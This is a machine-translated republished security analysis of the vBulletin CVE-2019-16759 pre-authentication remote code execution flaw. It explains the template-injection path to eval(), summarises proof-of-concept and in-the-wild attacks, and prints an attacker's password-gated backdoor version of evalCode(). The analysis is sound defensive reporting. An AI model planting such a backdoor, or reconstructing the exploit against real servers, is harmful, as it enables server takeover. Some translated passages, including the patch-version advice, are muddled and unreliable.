Shulou(Shulou.com)05/31 Report--

This article introduces how to carry out vBulletin pre-certification remote code execution vulnerability CVE-2019-16759 analysis, the content is very detailed, interested friends can refer to, hope to be helpful to you.

VBulletin revealed the details of a recent 0 day vulnerability with the assigned CVE number CVE-2019-16759. At the same time, security researchers at Unit 42 have also found that many attackers are exploiting this vulnerability to carry out attacks on the Internet. With the help of this vulnerability, unauthenticated attackers will be able to access and control servers running v5.0.0 to v5.5.4 versions of vBulletin and prevent network administrators from accessing these servers. Currently, there are about 100000 websites using vBulletin, including many large enterprises, organizations, and forums, so this vulnerability should be fixed immediately.

In this article, we will analyze the cause of this vulnerability and give the PoC demo code and other details about the vulnerability.

Analysis of the causes of loopholes

CVE-2019-16759 is a pre-authenticated remote code execution vulnerability with a CVSS score of 9.8. An Ajax rendering function introduced in version 5.0.0 of vBulletin v, which will trigger PHP server-side template injection and eventually lead to this pre-authenticated remote code execution vulnerability.

First, let's take a look at the index.php code:

This code calls vB5_Frontend_ApplicationLight::isQuickRoute () to determine whether the request is "quick route", using isQuickRoute () located in includes/vb5/frontend/applicationlight.php:

In the figure above, if the request starts with "ajax/api" or "ajax/render", the function will return that the true,vB5_Frontend_ApplicationLight object will be initialized.

When the received request starts with "ajax/render", the processor shown above will be set to "callRender":

The callRender () function in the figure above will render the template with parameters from $routeInfo [2] and $params from array_merge ($_ POST, $GET):

According to the above figure, there is a widget_php template in the vbulletin-style.xml file, and if the $widgetConfig ['code'] in the template is not empty and $vboptions [' disable_php_rendering'] is disabled, the following code is executed:

{vb:action evaledPHP, bbcode, evalCode, {vb:raw widgetConfig.code}} {vb:raw $evaledPHP}

The figure above shows the code for the evalCode () function, and the commands in $code are executed directly by the PHPeval () function. The request constructed using the params parameter is as follows:

Vulnerability proof of concept PoC

Because the parameter routestring comes from $_ REQUEST, it can be sent through methods such as $_ GET, $_ POST, and $_ COOKIE HTTP, while widgetConfig [code] can be sent through the $_ GET or $_ POST method, so we build the following request:

The figure above shows the result of the phpinfo () function running after the PoC code is sent through a GET request.

The following figure shows the result of the phpinfo () function running after the PoC code is sent through a POST request:

Analysis on the exploitation of vulnerabilities in the field

So far, researchers have detected a number of examples of wild exploitation of this vulnerability. As shown in the following figure, the attacker attempted to execute the "die (@ md5 (HellovBulletin))" command to determine whether the target server had this vulnerability, but the exploit failed because of an additional equal sign "=" in the request:

The following figure shows an attacker trying to create a file called "webconfig.txt.php" in the Web root directory of the target server:

The following figure shows the contents of the webconfig.txt.php and an one-line PHP webshell that will allow an attacker to send arbitrary commands to the target host and execute the commands:

The following figure shows the third example of exploitation in the field, where the attacker attempted to overwrite the bbcode.php file:

Once successfully exploited, the evalCode () function will look like this:

Function evalCode ($code) {ob_start (); if (isset ($_ REQUEST ["epass"]) & & $_ REQUEST ["epass"] = = "2dmfrb28nu3c6s9j") {eval ($code);} $output = ob_get_contents (); ob_end_clean (); return $output;}

With the above, when "epass" is sent with the value "2dmfrb28nu3c6s9j" in the request, the target host will execute the code of the evalCode () function.

Vulnerability repair

The researchers suggest that the vast number of network administrators update vBulletin to v5.5.2, Patch Level 3, and 4 as soon as possible.

On how to carry out vBulletin pre-certification remote code execution vulnerability CVE-2019-16759 analysis is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.